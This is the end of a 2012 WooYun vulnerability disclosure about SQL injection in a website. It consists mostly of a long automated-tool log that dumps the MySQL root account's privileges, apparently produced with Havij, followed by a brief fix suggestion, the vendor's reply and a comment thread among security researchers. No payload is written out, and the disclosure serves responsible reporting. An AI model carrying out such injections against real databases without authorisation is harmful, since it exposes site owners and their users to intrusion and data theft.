Data Found: PRIVILEGE_TYPE=SHOW DATABASES
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=CREATE ROUTINE
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=CREATE
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=REPLICATION CLIENT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=PROCESS
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=CREATE ROUTINE
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=DROP
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=TRIGGER
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=PROCESS
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=DELETE
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=DROP
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=ALTER
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=TRIGGER
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=DELETE
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=DELETE
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=ALTER
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=SHUTDOWN
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=SHOW VIEW
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=LOCK TABLES
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=EVENT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=SHUTDOWN
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=ALTER ROUTINE
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=LOCK TABLES
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=INDEX
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=FILE
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=CREATE
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=EXECUTE
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=INDEX
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=RELOAD
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=CREATE VIEW
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=CREATE TEMPORARY TABLES
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=CREATE USER
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=CREATE USER
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=INSERT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=CREATE TEMPORARY TABLES
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=REFERENCES
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=CREATE USER
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=REPLICATION CLIENT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=INSERT
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=EVENT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=DROP
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=REPLICATION CLIENT
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=SUPER
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=SHUTDOWN
Turning off 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'127.0.0.1'
Data Found: IS_GRANTABLE=YES
Data Found: PRIVILEGE_TYPE=ALTER ROUTINE
Turning on 'bypass illegal union' and retrying!
Data Found: TABLE_CATALOG=
Data Found: GRANTEE='root'@'localhost'


修复方案:

加强安全体系,这样的血案还是比较典型啊!

版权声明:转载请注明来源 zeracker@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-05-31 11:26

厂商回复:

给20分感谢,感谢熬夜找漏洞~

最新状态:

2012-05-31:另外提示下,此域名非百度域名,非管辖范围内


漏洞评价:

评论

  1. 2012-05-31 11:24 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    哈哈,洞主强大。

  2. 2012-05-31 11:24 | d4rkwind ( 路人 | Rank:8 漏洞数:2 | 关注web 安全,产品安全)

  3. 2012-05-31 11:25 | d4rkwind ( 路人 | Rank:8 漏洞数:2 | 关注web 安全,产品安全)

    这个只是百伯,其实不算是百度的

  4. 2012-05-31 11:29 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    哈哈!就这么想当二爷?拼老命了!如果你这个有那个问题的服务器集群多且是核心业务,我支持给你加精!

  5. 2012-05-31 11:30 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    楼上争起来了,围观。

  6. 2012-05-31 11:31 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @shine 各种服务器指定的数据库表跑出来了。很明显了哥。

  7. 2012-05-31 11:31 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    打错字了。妈呀,发移动主站去了。

  8. 2012-05-31 11:35 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @zeracker 难道比影响到整个核心业务应用厉害?

  9. 2012-05-31 11:36 | Jannock 认证白帽子 ( 核心白帽子 | Rank:2278 漏洞数:204 | 关注技术与网络安全(招人中,有兴趣请私信...)

    强大!

  10. 2012-05-31 11:38 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:77 | coder)

    @zeracker 哈哈!让让你当当二爷,过过瘾吧!

  11. 2012-05-31 11:51 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @shine %>_<%。。。我会被喷死的。。各种喷吧。

  12. 2012-05-31 11:52 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @Jannock 带头大哥说了,每次都是不小心,昨天我也是不小心的。真的。

  13. 2012-05-31 11:53 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @百度 你不能这样捏?

  14. 2012-05-31 12:34 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    哎,都不承认大问题。

  15. 2012-05-31 12:45 | itleaf ( 普通白帽子 | Rank:140 漏洞数:17 )

    最新状态:2012-05-31:另外提示下,此域名非百度域名,非管辖范围内

  16. 2012-05-31 13:25 | 阿门 ( 普通白帽子 | Rank:187 漏洞数:19 | 123)

    20是安慰你弱小的小心灵的呢,现在的各种2.

  17. 2012-05-31 15:32 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    一个一个的好凶残~~

  18. 2012-05-31 16:04 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @gainover 各种精华,各种羡慕嫉妒恨

  19. 2012-06-30 11:35 | 冬眠的蛇 ( 路人 | Rank:21 漏洞数:4 | 没什么好说的)

    havij 在WIN7 不能用啊